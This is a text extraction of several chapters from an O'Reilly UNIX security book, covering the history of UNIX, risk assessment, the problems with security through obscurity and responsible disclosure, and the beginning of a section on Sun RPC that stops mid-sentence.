unused PDP-7 computer to pursue some of the MULTICS ideas on his own. Thompson was soon joined<br />

by Dennis Ritchie, who had also worked on MULTICS. Peter Neumann suggested the name <strong>UNIX</strong> for<br />

the new system. The name was a pun on the name MULTICS and a backhanded slap at the project that<br />

was continuing in Cambridge (and indeed continued for another decade and a half). Whereas MULTICS<br />

tried to do many things, <strong>UNIX</strong> tried to do one thing well: run programs. The concept of strong security<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_03.htm (1 of 7) [2002-04-12 10:44:51]


[Chapter 1] 1.3 History of <strong>UNIX</strong><br />

was not part of this goal.<br />

The smaller scope was all the impetus that the researchers needed; an early version of <strong>UNIX</strong> was<br />

operational several months before MULTICS. Within a year, Thompson, Ritchie, and others rewrote<br />

<strong>UNIX</strong> for Digital's new PDP-11 computer.<br />

As AT&T's scientists added features to their system throughout the 1970s, <strong>UNIX</strong> evolved into a<br />

programmer's dream. The system was based on compact programs, called tools, each of which performed<br />

a single function. By putting tools together, programmers could do complicated things. <strong>UNIX</strong> mimicked<br />

the way programmers thought. To get the full functionality of the system, users needed access to all of<br />

these tools - and in many cases, to the source code for the tools as well. Thus, as the system evolved,<br />

nearly everyone with access to the machines aided in the creation of new tools and in the debugging of<br />

existing ones.<br />

In 1973, Thompson rewrote most of <strong>UNIX</strong> in Ritchie's newly invented C programming language. C was<br />

designed to be a simple, portable language. Programs written in C could be moved easily from one kind<br />

of computer to another - as was the case with programs written in other high-level languages like<br />

FORTRAN - yet they ran nearly as fast as programs coded directly in a computer's native machine<br />

language.<br />

At least, that was the theory. In practice, every different kind of computer at Bell Labs had its own<br />

operating system. C programs written on the PDP-11 could be recompiled on the lab's other machines,<br />

but they didn't always run properly, because every operating system performed input and output in<br />

slightly different ways. Mike Lesk developed a " portable I/O library" to overcome some of the<br />

incompatibilities, but many remained. Then, in 1977, the group realized that it might be easier to port the<br />

<strong>UNIX</strong> operating system itself rather than trying to port all of the libraries. <strong>UNIX</strong> was first ported to the<br />

lab's Interdata 8/32, a microcomputer similar to the PDP-11. In 1978, the operating system was ported to<br />

Digital's new VAX minicomputer. <strong>UNIX</strong> still remained very much an experimental operating system.<br />

Nevertheless, <strong>UNIX</strong> had become a popular operating system in many universities and was already being<br />

marketed by several companies. <strong>UNIX</strong> was suddenly more than just a research curiosity.<br />

Indeed, as early as 1973, there were more than 16 different AT&T or Western Electric sites outside Bell<br />

Labs running the operating system. <strong>UNIX</strong> soon spread even further. Thompson and Ritchie presented a<br />

paper on the operating system at the ACM Symposium on Operating System Principles (SOSP) in<br />

October 1973. Within a matter of months, sites around the world had obtained and installed copies of the<br />

system. Even though AT&T was forbidden under the terms of its 1956 Consent Decree with the U.S.<br />

Federal government from advertising, marketing, or supporting computer software, demand for <strong>UNIX</strong><br />

steadily rose. By 1977, more than 500 sites were running the operating system; 125 of them were at<br />

universities, in the U.S. and more than 10 foreign countries. 1977 also saw the first commercial support<br />

for <strong>UNIX</strong>, then at Version 6.<br />

At most sites, and especially at universities, the typical <strong>UNIX</strong> environment was like that inside Bell<br />

Labs: the machines were in well-equipped labs with restricted physical access. The users who made<br />

extensive use of the machines were people who had long-term access and who usually made significant<br />

modifications to the operating system and its utilities to provide additional functionality. They did not<br />

need to worry about security on the system because only authorized individuals had access to the<br />

machines. In fact, implementing security mechanisms often hindered the development of utilities and<br />

customization of the software. One of the authors worked in two such labs in the early 1980s, and one<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_03.htm (2 of 7) [2002-04-12 10:44:51]


[Chapter 1] 1.3 History of <strong>UNIX</strong><br />

location viewed having a password on the root account as an annoyance because everyone who could get<br />

to the machine was authorized to use it as the superuser!<br />

This environment was perhaps best typified by the development at the University of California at<br />

Berkeley. Like other schools, Berkeley had paid $400 for a tape that included the complete source code<br />

to the operating system. Instead of merely running <strong>UNIX</strong>, two of Berkeley's bright graduate students, Bill<br />

Joy and Chuck Haley, started making significant modifications. In 1978, Joy sent out 30 copies of the "<br />

Berkeley Software Distribution (BSD)," a collection of programs and modifications to the <strong>UNIX</strong> system.<br />

The charge: $50 for media and postage.<br />

Over the next six years, in an effort funded by ARPA, the so-called BSD <strong>UNIX</strong> grew into an operating<br />

system of its own that offered significant improvements over AT&T's. For example, a programmer using<br />

BSD <strong>UNIX</strong> could switch between multiple programs running at the same time. AT&T's <strong>UNIX</strong> allowed<br />

the names on files to be only 14 letters long, but Berkeley's allowed names of up to 255 characters. But<br />

perhaps the most important of the Berkeley improvements was the BSD 4.2 <strong>UNIX</strong> networking software,<br />

which made it easy to connect <strong>UNIX</strong> computers to local area[5] networks (LANs). For all of these<br />

reasons, the Berkeley version of <strong>UNIX</strong> became very popular with the research and academic<br />

communities.<br />

[5] And we stress, local area.<br />

About the same time, AT&T had been freed from its restrictions on developing and marketing source<br />

code as a result of the enforced divestiture of the phone company. Executives realized that they had a<br />

strong potential product in <strong>UNIX</strong>, and they set about developing it into a more polished commercial<br />

product. This led to an interesting change in the numbering of the BSD releases.<br />

Berkeley 4.2 <strong>UNIX</strong> should have been numbered 5.0. However, by the time that the 4.2 Berkeley<br />

Software Distribution was ready to be released, friction was growing between the developers at Berkeley<br />

and the management of AT&T, who owned the <strong>UNIX</strong> trademark and rights to the operating system. As<br />

<strong>UNIX</strong> had grown in popularity, AT&T executives became increasingly worried that, with the popularity<br />

of Berkeley <strong>UNIX</strong>, AT&T was on the verge of losing control of a valuable property right. To retain<br />

control of <strong>UNIX</strong>, AT&T formed the <strong>UNIX</strong> Support Group (USG) to continue development and<br />

marketing of the <strong>UNIX</strong> operating system. USG proceeded to christen a new version of <strong>UNIX</strong> as AT&T<br />

System V, and declare it the new "standard"; AT&T representatives referred to BSD <strong>UNIX</strong> as<br />

nonstandard and incompatible.<br />

Under Berkeley's license with AT&T, the university was free to release updates to existing AT&T <strong>UNIX</strong><br />

customers. But if Berkeley had decided to call its new version of <strong>UNIX</strong> "5.0," it would have needed to<br />

renegotiate its licensing agreement to distribute the software to other universities and companies. Thus,<br />

Berkeley released BSD 4.2. By calling the new release of the operating system "4.2," they pretended that<br />

the system was simply a minor update.<br />

As interest in <strong>UNIX</strong> grew, the industry was beset by two competing versions of <strong>UNIX</strong>: Berkeley <strong>UNIX</strong><br />

and AT&T's System V. The biggest non-university proponent of Berkeley <strong>UNIX</strong> was Sun Microsystems.<br />

Founded in part by graduates from Berkeley's computer science program, Sun's SunOS operating system<br />

was, for all practical purposes, Berkeley's operating system, as it was based on BSD 4.1c. Many people<br />

believe that Sun's adoption of Berkeley <strong>UNIX</strong> was responsible for the early success of the company.<br />

Another early adopter was the Digital Equipment Corporation, whose Ultrix operating system was also<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_03.htm (3 of 7) [2002-04-12 10:44:51]


[Chapter 1] 1.3 History of <strong>UNIX</strong><br />

quite similar to Berkeley <strong>UNIX</strong> - not surprising as it was based on BSD 4.2.<br />

As other companies entered the <strong>UNIX</strong> marketplace, they faced a question of which version of <strong>UNIX</strong> to<br />

adopt. On the one hand, there was Berkeley <strong>UNIX</strong>, which was preferred by academics and developers,<br />

but which was "unsupported" and was frighteningly similar to the operating system used by Sun, soon to<br />

become the market leader. On the other hand, there was AT&T System V <strong>UNIX</strong>, which AT&T, the<br />

owner of <strong>UNIX</strong>, was proclaiming as the operating system "standard." As a result, most computer<br />

manufacturers that tried to develop <strong>UNIX</strong> in the mid-to-late 1980s - including Data General, IBM,<br />

Hewlett Packard, and Silicon Graphics - adopted System V as their standard. A few tried to do both,<br />

coming out with systems that had dual "universes." A third version of <strong>UNIX</strong>, called Xenix, was<br />

developed by Microsoft in the early 1980s and licensed to the Santa Cruz Operation (SCO). Xenix was<br />

based on AT&T's older System III operating system, although Microsoft and SCO had updated it<br />

throughout the 1980s, adding some new features, but not others.<br />

As <strong>UNIX</strong> started to move from the technical to the commercial markets in the late 1980s, this conflict of<br />

operating system versions was beginning to cause problems for all vendors. Commercial customers<br />

wanted a standard version of <strong>UNIX</strong>, hoping that it could cut training costs and guarantee software<br />

portability across computers made by different vendors. And the nascent <strong>UNIX</strong> applications market<br />

wanted a standard version, believing that this would make it easier for them to support multiple<br />

platforms, as well as compete with the growing PC-based market.<br />

The first two versions of <strong>UNIX</strong> to merge were Xenix and AT&T's System V. The resulting version,<br />

<strong>UNIX</strong> System V/386, release 3.l2, incorporated all the functionality of traditional <strong>UNIX</strong> System V and<br />

Xenix. It was released in August 1988 for 80386-based computers.<br />

In the spring of 1988, AT&T and Sun Microsystems signed a joint development agreement to merge the<br />

two versions of <strong>UNIX</strong>. The new version of <strong>UNIX</strong>, System V Release 4 (SVR4), was to have the best<br />

features of System V and Berkeley <strong>UNIX</strong> and be compatible with programs written for either. Sun<br />

proclaimed that it would abandon its SunOS operating system and move its entire user base over to its<br />

own version of the new operating system, which it would call Solaris.[6]<br />

[6] Some documentation labels the combined versions of SunOS and AT&T System V as<br />

SunOS 5.0, and uses the name Solaris to designate SunOS 5.0 with the addition of<br />

OpenWindows and other applications.<br />

The rest of the <strong>UNIX</strong> industry felt left out and threatened by the Sun/AT&T announcement. Companies<br />

including IBM and Hewlett-Packard worried that, because they were not a part of the SVR4 development<br />

effort, they would be at a disadvantage when the new operating system was finally released. In May<br />

1988, seven of the industry's <strong>UNIX</strong> leaders - Apollo Computer, Digital Equipment Corporation,<br />

Hewlett-Packard, IBM, and three major European computer manufacturers - announced the formation of<br />

the Open Software Foundation (OSF).<br />

The stated purpose of OSF was to wrest control of <strong>UNIX</strong> away from AT&T and put it in the hands of a<br />

not-for-profit industry coalition, which would be chartered with shepherding the future development of<br />

<strong>UNIX</strong> and making it available to all under uniform licensing terms. OSF decided to base its version of<br />

<strong>UNIX</strong> on AIX, then moved to the MACH kernel from Carnegie Mellon University, and an assortment of<br />

<strong>UNIX</strong> libraries and utilities from HP, IBM, and Digital. To date, the result of this effort has not been<br />

widely adopted or embraced by all the participants. The OSF operating system (OSF/1) was late in<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_03.htm (4 of 7) [2002-04-12 10:44:51]


[Chapter 1] 1.3 History of <strong>UNIX</strong><br />

coming, so some companies built their own (e.g., IBM's AIX). Others adopted SVR4 after it was<br />

released, in part because it was available, and in part because AT&T and Sun went their separate ways -<br />

thus ending the threat against which OSF had been rallied.<br />

As of 1996, the <strong>UNIX</strong> wars are far from settled, but they are much less important than they seemed in the<br />

early 1990s. In 1993, AT&T sold <strong>UNIX</strong> Systems Laboratories (USL) to Novell, having succeeded in<br />

making SVR4 an industry standard, but having failed to make significant inroads against Microsoft's<br />

Windows operating system on the corporate desktop. Novell then transferred the <strong>UNIX</strong> trademark to the<br />

X/Open Consortium, which is granting use of the name to systems that meet its 1170 test suite. Novell<br />

subsequently sold ownership of the <strong>UNIX</strong> source code to SCO in 1995, effectively disbanding USL.<br />

Although Digital Equipment Corporation provides Digital <strong>UNIX</strong> (formerly OSF/1) on its workstations,<br />

Digital's strongest division isn't workstations, but its PC division. Despite the fact that Sun's customers<br />

said that they wanted System V compatibility, Sun had difficulty convincing the majority of its<br />

customers to actually use its Solaris operating system during the first few years of its release (and many<br />

users still complain about the switch). BSD/OS by BSD Inc., a commercial version of BSD 4.4, is used<br />

in a significant number of network firewall systems, VAR systems, and academic research labs.<br />

Meanwhile, a free <strong>UNIX</strong>-like operating system - Linux - has taken the hobbyist and small-business<br />

market by storm. Several other free implementations of <strong>UNIX</strong> and <strong>UNIX</strong>-like systems for PCs -<br />

including versions based on BSD 4.3 and 4.4, and the Mach system developed at Carnegie Mellon<br />

University - have also gained widespread use. Figure 1.1 shows the current situation with versions of<br />

<strong>UNIX</strong>.<br />

Figure 1.1: Versions of <strong>UNIX</strong><br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_03.htm (5 of 7) [2002-04-12 10:44:51]


[Chapter 1] 1.3 History of <strong>UNIX</strong><br />

Despite the lack of unification, the number of <strong>UNIX</strong> systems continues to grow. As of the mid 1990s,<br />

<strong>UNIX</strong> runs on an estimated five million computers throughout the world. Versions of <strong>UNIX</strong> run on<br />

nearly every computer in existence, from small IBM PCs to large supercomputers such as Crays.<br />

Because it is so easily adapted to new kinds of computers, <strong>UNIX</strong> is the operating system of choice for<br />

many of today's high-performance microprocessors. Because a set of versions of the operating system's<br />

source code is readily available to educational institutions, <strong>UNIX</strong> has also become the operating system<br />

of choice for educational computing at many universities and colleges. It is also popular in the research<br />

community because computer scientists like the ability to modify the tools they use to suit their own<br />

needs.<br />

<strong>UNIX</strong> has become popular too, in the business community. In large part this popularity is because of the<br />

increasing numbers of people who have studied computing using a <strong>UNIX</strong> system, and who have sought<br />

to use <strong>UNIX</strong> in their business applications. Users who become familiar with <strong>UNIX</strong> tend to become very<br />

attached to the openness and flexibility of the system. The client-server model of computing has also<br />

become quite popular in business environments, and <strong>UNIX</strong> systems support this paradigm well (and<br />

there have not been too many other choices).<br />

Furthermore, a set of standards for a <strong>UNIX</strong>-like operating system (including interface, library, and<br />

behavioral characteristics) has emerged, although considerable variability among implementations<br />

remains. This set of standards is POSIX, originally initiated by IEEE, but also adopted as ISO/IEC 9945.<br />

People can now buy different machines from different vendors, and still have a common interface.<br />

Efforts are also focused on putting the same interface on VMS, Windows NT, and other platforms quite<br />

different from <strong>UNIX</strong> "under the hood." Today's <strong>UNIX</strong> is based on many such standards, and this greatly<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_03.htm (6 of 7) [2002-04-12 10:44:51]


[Chapter 1] 1.3 History of <strong>UNIX</strong><br />

increases its attractiveness as a common platform base in business and academia alike. <strong>UNIX</strong> vendors<br />

and users are the leaders of the "open systems" movement: without <strong>UNIX</strong>, the very concept of "open<br />

systems" would probably not exist. No longer do computer purchases lock a customer into a<br />

multi-decade relationship with a single vendor.<br />

1.2 What Is an Operating<br />

System?<br />

1.4 <strong>Sec</strong>urity and <strong>UNIX</strong><br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_03.htm (7 of 7) [2002-04-12 10:44:51]


[Chapter 2] 2.2 Risk Assessment<br />

2.2 Risk Assessment<br />

Chapter 2<br />

Policies and Guidelines<br />

The first step to improving the security of your system is to answer these basic questions:<br />

●<br />

●<br />

●<br />

What am I trying to protect?<br />

What do I need to protect against?<br />

How much time, effort, and money am I willing to expend to obtain adequate protection?<br />

These questions form the basis of the process known as risk assessment.<br />

Risk assessment is a very important part of the computer security process. You cannot protect yourself if<br />

you do not know what you are protecting yourself against! After you know your risks, you can then plan<br />

the policies and techniques that you need to implement to reduce those risks.<br />

For example, if there is a risk of a power failure and if availability of your equipment is important to you,<br />

you can reduce this risk by purchasing an uninterruptable power supply (UPS).<br />

2.2.1 A Simple Assessment Strategy<br />

We'll present a simplistic form of risk assessment to give you a starting point. This example may be more<br />

complex than you really need for a home computer system or very small company. The example is also<br />

undoubtedly insufficient for a large company, a government agency, or a major university. In cases such<br />

as those, you need to consider specialized software to do assessments, and the possibility of hiring an<br />

outside consulting firm with expertise in risk assessment.<br />

The three key steps in doing a risk assessment are:<br />

1.<br />

2.<br />

3.<br />

Identifying assets<br />

Identifying threats<br />

Calculating risks<br />

There are many ways to go about this process. One method with which we have had great success is a<br />

series of in-house workshops. Invite a cross-section of users, managers, and executives from throughout<br />

your organization. Over a series of weeks, compose your lists of assets and threats. Not only will this<br />

process help to build a more complete set of lists, it will also help to increase awareness of security in<br />

everyone who attends.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_02.htm (1 of 4) [2002-04-12 10:44:51]


[Chapter 2] 2.2 Risk Assessment<br />

2.2.1.1 Identifying assets<br />

Draw up a list of items you need to protect. This list should be based on your business plan and common<br />

sense. The process may require knowledge of applicable law, a complete understanding of your facilities,<br />

and knowledge of your insurance coverage.<br />

Items to protect include tangibles (disk drives, monitors, network cables, backup media, manuals) and<br />

intangibles (ability to continue processing, public image, reputation in your industry, access to your<br />

computer, your system's root password). The list should include everything that you consider of value.<br />

To determine if something is valuable, consider what the loss or damage of the item might be in terms of<br />

lost revenue, lost time, or the cost of repair or replacement.<br />

Some of the items that should probably be in your asset list include:<br />

Tangibles:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Computers<br />

Proprietary data<br />

Backups and archives<br />

Manuals, guides, books<br />

Printouts<br />

Intangibles:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Commercial software distribution media<br />

Communications equipment and wiring<br />

Personnel records<br />

Audit records<br />

Safety and health of personnel<br />

Privacy of users<br />

Personnel passwords<br />

Public image and reputation<br />

Customer/client goodwill<br />

Processing availability<br />

Configuration information<br />

You should take a larger view of these and related items rather than simply considering the computer<br />

aspects. If you are concerned about someone reading your internal financial reports, you should be<br />

concerned regardless of whether they read them from a discarded printout or snoop on your email.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_02.htm (2 of 4) [2002-04-12 10:44:51]


[Chapter 2] 2.2 Risk Assessment<br />

2.2.1.2 Identifying threats<br />

The next step is to determine a list of threats to your assets. Some of these threats will be environmental,<br />

and include fire, earthquake, explosion, and flood. They should also include very rare but possible events<br />

such as building structural failure, or discovery of asbestos in your computer room that requires you to<br />

vacate the building for a prolonged time. Other threats come from personnel, and from outsiders. We list<br />

some examples here:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Illness of key people<br />

Simultaneous illness of many personnel (e.g., flu epidemic)<br />

Loss (resignation/termination/death) of key personnel<br />

Loss of phone/network services<br />

Loss of utilities (phone, water, electricity) for a short time<br />

Loss of utilities (phone, water, electricity) for a prolonged time<br />

Lightning strike<br />

Flood<br />

Theft of disks or tapes<br />

Theft of key person's laptop computer<br />

Theft of key person's home computer<br />

Introduction of a virus<br />

Computer vendor bankruptcy<br />

Bugs in software<br />

Subverted employees<br />

Subverted third-party personnel (e.g., vendor maintenance)<br />

Labor unrest<br />

Political terrorism<br />

Random "hackers" getting into your machines<br />

Users posting inflammatory or proprietary information to the Usenet<br />

2.2.1.3 Quantifying the threats<br />

After you have identified the threats, you need to estimate the likelihood of each occurring. These threats<br />

may be easiest to estimate on a year-by-year basis.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_02.htm (3 of 4) [2002-04-12 10:44:51]


[Chapter 2] 2.2 Risk Assessment<br />

Quantifying the threat of a risk is hard work. You can obtain some estimates from third parties, such as<br />

insurance companies. If the event happens on a regular basis, you can estimate it based on your records.<br />

Industry organizations may have collected statistics or published reports. You can also base your<br />

estimates on educated guesses extrapolated from past experience. For instance:<br />

●<br />

●<br />

●<br />

●<br />

Your power company can provide an official estimate of the likelihood that your building would<br />

suffer a power outage during the next year. They may also be able to quantify the risk of an outage<br />

lasting a few seconds vs. the risk of an outage lasting minutes or hours.<br />

Your insurance carrier can provide you with actuarial data on the probability of death of key<br />

personnel based on age and health.[3]<br />

[3] Note the difference in this estimate between smokers and nonsmokers. This<br />

difference may present a strategy for risk abatement.<br />

Your personnel records can be used to estimate the probability of key computing employees<br />

quitting.<br />

Past experience and best guess can be used to estimate the probability of a serious bug being<br />

discovered in your vendor software during the next year (probably 100%).<br />

If you expect something to happen more than once per year, then record the number of times that you<br />

expect it to happen. Thus, you may expect a serious earthquake only once every 100 years (1% in your<br />

list), but you may expect three serious bugs in sendmail to be discovered during the next year (300%).<br />

2.2.2 Review Your Risks<br />

Risk assessment should not be done only once and then forgotten. Instead, you should update your<br />

assessment periodically. In addition, the threat assessment portion should be redone whenever you have a<br />

significant change in operation or structure. Thus, if you reorganize, move to a new building, switch<br />

vendors, or undergo other major changes, you should reassess the threats and potential losses.<br />

2.1 Planning Your <strong>Sec</strong>urity<br />

Needs<br />

2.3 Cost-Benefit Analysis<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_02.htm (4 of 4) [2002-04-12 10:44:51]


[Chapter 2] 2.5 The Problem with <strong>Sec</strong>urity Through Obscurity<br />

Chapter 2<br />

Policies and Guidelines<br />

2.5 The Problem with <strong>Sec</strong>urity Through Obscurity<br />

We'd like to close this chapter on policy formation with a few words about knowledge. In traditional<br />

security, derived largely from military intelligence, there is the concept of "need to know." Information is<br />

partitioned, and you are given only as much as you need to do your job. In environments where specific<br />

items of information are sensitive or where inferential security is a concern, this policy makes<br />

considerable sense. If three pieces of information together can form a damaging conclusion and no one<br />

has access to more than two, you can ensure confidentiality.<br />

In a computer operations environment, applying the same need-to-know concept is usually not<br />

appropriate. This is especially true if you should find yourself basing your security on the fact that<br />

something technical is unknown to your attackers. This concept can even hurt your security.<br />

Consider an environment in which management decides to keep the manuals away from the users to<br />

prevent them from learning about commands and options that might be used to crack the system. Under<br />

such circumstances, the managers might believe they've increased their security, but they probably have<br />

not. A determined attacker will find the same documentation elsewhere - from other users or from other<br />

sites. Many vendors will sell copies of their documentation without requiring an executed license.<br />

Usually all that is required is a visit to a local college or university to find copies. Extensive amounts of<br />

<strong>UNIX</strong> documentation are available as close as the nearest bookstore! Management cannot close down all<br />

possible avenues for learning about the system.<br />

In the meantime, the local users are likely to make less efficient use of the machine because they are<br />

unable to view the documentation and learn about more efficient options. They are also likely to have a<br />

poorer attitude because the implicit message from management is "We don't completely trust you to be a<br />

responsible user." Furthermore, if someone does start abusing commands and features of the system,<br />

management does not have a pool of talent to recognize or deal with the problem. And if something<br />

should happen to the one or two users authorized to access the documentation, there is no one with the<br />

requisite experience or knowledge to step in or help out.<br />

Keeping bugs or features secret to protect them is also a poor approach to security. System developers<br />

often insert back doors in their programs to let them gain privileges without supplying passwords (see<br />

Chapter 11, Protecting Against Programmed Threats). Other times, system bugs with profound security<br />

implications are allowed to persist because management assumes that nobody knows of them. The<br />

problem with these approaches is that features and problems in the code have a tendency to be<br />

discovered by accident or by determined crackers. The fact that the bugs and features are kept secret<br />

means that they are unwatched, and probably unpatched. After being discovered, the existence of the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_05.htm (1 of 4) [2002-04-12 10:44:52]


[Chapter 2] 2.5 The Problem with <strong>Sec</strong>urity Through Obscurity<br />

problem will make all similar systems vulnerable to attack by the persons who discover the problem.<br />

Keeping algorithms secret, such as a locally developed encryption algorithm, is also of questionable<br />

value. Unless you are an expert in cryptography, you are unlikely to be able to analyze the strength of<br />

your algorithm. The result may be a mechanism that has a gaping hole in it. An algorithm that is kept<br />

secret isn't scrutinized by others, and thus someone who does discover the hole may have free access to<br />

your data without your knowledge.<br />

Likewise, keeping the source code of your operating system or application secret is no guarantee of<br />

security. Those who are determined to break into your system will occasionally find security holes, with<br />

or without source code. But without the source code, users cannot carry out a systematic examination of<br />

a program for problems.<br />

The key is attitude. If you take defensive measures that are based primarily on secrecy, you lose all your<br />

protections after secrecy is breached. You can even be in a position where you can't determine whether<br />

the secrecy has been breached, because to maintain the secrecy, you've restricted or prevented auditing<br />

and monitoring. You are better served by algorithms and mechanisms that are inherently strong, even if<br />

they're known to an attacker. The very fact that you are using strong, known mechanisms may discourage<br />

an attacker and cause the idly curious to seek excitement elsewhere. Putting your money in a wall safe is<br />

better protection than depending on the fact that no one knows that you hide your money in a mayonnaise<br />

jar in your refrigerator.<br />

2.5.1 Going Public<br />

Despite our objection to "security through obscurity," we do not advocate that you widely publicize new<br />

security holes the moment that you find them. There is a difference between secrecy and prudence! If<br />

you discover a security hole in distributed or widely available software, you should quietly report it to the<br />

vendor as soon as possible. We would also recommend that you also report it to one of the FIRST teams<br />

(described in Appendix F, Organizations). Those organizations can take action to help vendors develop<br />

patches and see that they are distributed in an appropriate manner.<br />

If you "go public" with a security hole, you endanger all of the people who are running that software but<br />

who don't have the ability to apply fixes. In the <strong>UNIX</strong> environment, many users are accustomed to<br />

having the source code available to make local modifications to correct flaws. Unfortunately, not<br />

everyone is so lucky, and many people have to wait weeks or months for updated software from their<br />

vendors. Some sites may not even be able to upgrade their software because they're running a turnkey<br />

application, or one that has been certified in some way based on the current configuration. Other systems<br />

are being run by individuals who don't have the necessary expertise to apply patches. Still others are no<br />

longer in production, or are at least out of maintenance. Always act responsibly. It may be preferable to<br />

circulate a patch without explaining or implying the underlying vulnerability than to give attackers<br />

details on how to break into unpatched systems.<br />

We have seen many instances in which a well-intentioned person reported a significant security problem<br />

in a very public forum. Although the person's intention was to elicit a rapid fix from the affected vendors,<br />

the result was a wave of break-ins to systems where the administrators did not have access to the same<br />

public forum, or were unable to apply a fix appropriate for their environment.<br />

Posting details of the latest security vulnerability in your system to the Usenet electronic bulletin board<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_05.htm (2 of 4) [2002-04-12 10:44:52]


[Chapter 2] 2.5 The Problem with <strong>Sec</strong>urity Through Obscurity<br />

system will not only endanger many other sites, it may also open you to civil action for damages if that<br />

flaw is used to break into those sites.[8] If you are concerned with your security, realize that you're a part<br />

of a community. Seek to reinforce the security of everyone else in that community as well - and<br />

remember that you may need the assistance of others one day.<br />

[8] Although we are unaware of any cases having been filed yet, on these grounds, several<br />

lawyers have told us that they are waiting for their clients to request such an action.<br />

2.5.2 Confidential Information<br />

Some security-related information is rightfully confidential. For instance, keeping your passwords from<br />

becoming public knowledge makes sense. This is not an example of security through obscurity. Unlike a<br />

bug or a back door in an operating system that gives an attacker superuser powers, passwords are<br />

designed to be kept secret and should be routinely changed to remain so.<br />

2.5.3 Final Words: Risk Management Means Common Sense<br />

The key to successful risk assessment is to identify all of the possible threats to your system, but only to<br />

defend against those attacks which you think are realistic threats.<br />

Simply because people are the weak link doesn't mean we should ignore other safeguards. People are<br />

unpredictable, but breaking into a dial-in modem that does not have a password is still cheaper than a<br />

bribe. So, we use technological defenses where we can, and we improve our personnel security by<br />

educating our staff and users.<br />

We also rely on defense in depth: we apply multiple levels of defenses as backups in case some fail. For<br />

instance, we buy that second UPS system, or we put a separate lock on the computer room door even<br />

though we have a lock on the building door. These combinations can be defeated too, but we increase the<br />

effort and cost for an enemy to do that...and maybe we can convince them that doing so isn't worth the<br />

trouble. At the very least, you can hope to slow them down enough so that your monitoring and alarms<br />

will bring help before anything significant is lost or damaged.<br />

With these limits in mind, you need to approach computer security with a thoughtfully developed set of<br />

priorities. You can't protect against every possible threat. Sometimes you should allow a problem to<br />

occur rather than prevent it, and then clean up afterwards. For instance, your efforts might be cheaper and<br />

less trouble if you let the systems go down in a power failure and then reboot than if you bought a UPS<br />

system. And some things you simply don't bother to defend against, either because they are too unlikely<br />

(e.g., an alien invasion from space), too difficult to defend against (e.g., a nuclear blast within 500 yards<br />

of your data center), or simply too catastrophic and horrible to contemplate (e.g., your management<br />

decides to switch all your <strong>UNIX</strong> machines to a well-known PC operating system). The key to good<br />

management is knowing what things you will worry about, and to what degree.<br />

Decide what you want to protect and what the costs might be to prevent those losses versus the cost of<br />

recovering from those losses. Then make your decisions for action and security measures based on a<br />

prioritized list of the most critical needs. Be sure you include more than your computers in this analysis:<br />

don't forget that your backup tapes, your network connections, your terminals, and your documentation<br />

are all part of the system and represent potential loss. The safety of your personnel, your corporate site,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_05.htm (3 of 4) [2002-04-12 10:44:52]


[Chapter 2] 2.5 The Problem with <strong>Sec</strong>urity Through Obscurity<br />

and your reputation are also very important and should be included in your plans.<br />

2.4 Policy II. User Responsibilities<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_05.htm (4 of 4) [2002-04-12 10:44:52]


[Chapter 19] 19.2 Sun's Remote Procedure Call (RPC)<br />

Chapter 19<br />

RPC, NIS, NIS+, and Kerberos<br />

19.2 Sun's Remote Procedure Call (RPC)<br />

The fundamental building block of all network information systems is a mechanism for performing<br />

remote procedure calls. This mechanism, usually called RPC, allows a program running on one computer<br />

to more-or-less transparently execute a function that is actually running on another computer.<br />

RPC systems can be categorized as blocking systems, which cause the calling program to cease execution<br />

until a result is returned, or as non-blocking (asynchronous systems), which means that the calling<br />

program continues running while the remote procedure call is performed. (The results of a non-blocking<br />

RPC, if they are returned, are usually provided through some type of callback scheme.)<br />

RPC allows programs to be distributed: a computationally intensive algorithm can be run on a high-speed<br />

computer, a remote sensing device can be run on another computer, and the results can be compiled on a<br />

third. RPC also makes it easy to create network-based client/server programs: the clients and servers<br />

communicate with each other using remote procedure calls.<br />

One of the first <strong>UNIX</strong> remote procedure call systems was developed by Sun Microsystems for use with<br />

NIS and NFS. Sun's RPC uses a system called XDR (external data representation), to represent binary<br />

information in a uniform manner and bit order. XDR allows a program running on a computer with one<br />

byte order, such as a SPARC workstation, to communicate seamlessly with a program running on a<br />

computer with an opposite byte order, such as a workstation with an Intel x86 microprocessor. RPC<br />

messages can be sent with either the TCP or UDP IP protocols (currently, the UDP version is more<br />

